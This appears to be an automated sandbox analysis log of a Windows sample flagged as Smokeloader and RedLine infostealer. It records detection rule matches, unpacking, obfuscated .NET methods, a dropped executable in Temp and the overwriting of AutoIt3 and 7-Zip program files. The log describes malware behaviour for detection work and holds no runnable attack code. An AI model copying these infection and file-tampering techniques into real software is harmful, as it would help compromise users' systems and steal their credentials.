Source: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: IoUNtL.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IoUNtL.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IoUNtL.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@5/11@1/2
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F4119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 1_2_00F4119F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2920
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe File created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Command line argument: 08A 0_2_00413780
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe "C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe"
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Process created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe C:\Users\user\AppData\Local\Temp\IoUNtL.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Process created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe C:\Users\user\AppData\Local\Temp\IoUNtL.exe
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.00000000006FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32^ source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source: Binary string: `C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source: Binary string: System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004D38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbW.: source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbu source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;u:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Unpacked PE file: 1.2.IoUNtL.exe.f40000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: initial sample Static PE information: section where entry point is pointing to: u
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Static PE information: section name: u
Source: IoUNtL.exe.0.dr Static PE information: section name: .aspack
Source: IoUNtL.exe.0.dr Static PE information: section name: .adata
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr Static PE information: section name: PELIB
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr Static PE information: section name: u
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0041C40C push cs; iretd 0_2_0041C4E2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00423149 push eax; ret 0_2_00423179
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0041C50E push cs; iretd 0_2_0041C4E2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_004231C8 push eax; ret 0_2_00423179
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0040E21D push ecx; ret 0_2_0040E230
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0041C6BE push ebx; ret 0_2_0041C6BF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0062C10E push ebx; ret 0_2_0062C10F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0061E46D push ecx; ret 0_2_0061E480
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0062BE5C push cs; iretd 0_2_0062BF32
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_0062BF5E push cs; iretd 0_2_0062BF32
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_006938C5 push ecx; iretd 0_2_006938C8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_00690A87 push FFFFFFE1h; ret 0_2_00690A96
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_006939D2 push edi; retf 0_2_006939D3
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_021D62D0 push ds; iretd 0_2_021D62DF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_021D52CC push es; iretd 0_2_021D52CF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060644A0 pushfd ; iretd 0_2_06064789
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_06064852 push es; ret 0_2_06064860
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060657D0 push 0C0603D8h; retf 0_2_0606582D
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Code function: 0_2_060A78B0 push es; ret 0_2_060A78C0
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F46076 push 00F414E1h; ret 1_2_00F46425
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F41638 push dword ptr [00F43084h]; ret 1_2_00F4170E
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F42D9B push ecx; ret 1_2_00F42DAB
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe Code function: 1_2_00F4600A push ebp; ret 1_2_00F4600D
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe Static PE information: section name: u entropy: 6.934487792037011
Source: IoUNtL.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ entropy: 6.935083153445225
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR entropy: 6.934720431366084
Source: SciTE.exe.1.dr Static PE information: section name: u entropy: 6.933665407742621
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe File created: C:\Program Files\7-Zip\Uninstall.exe
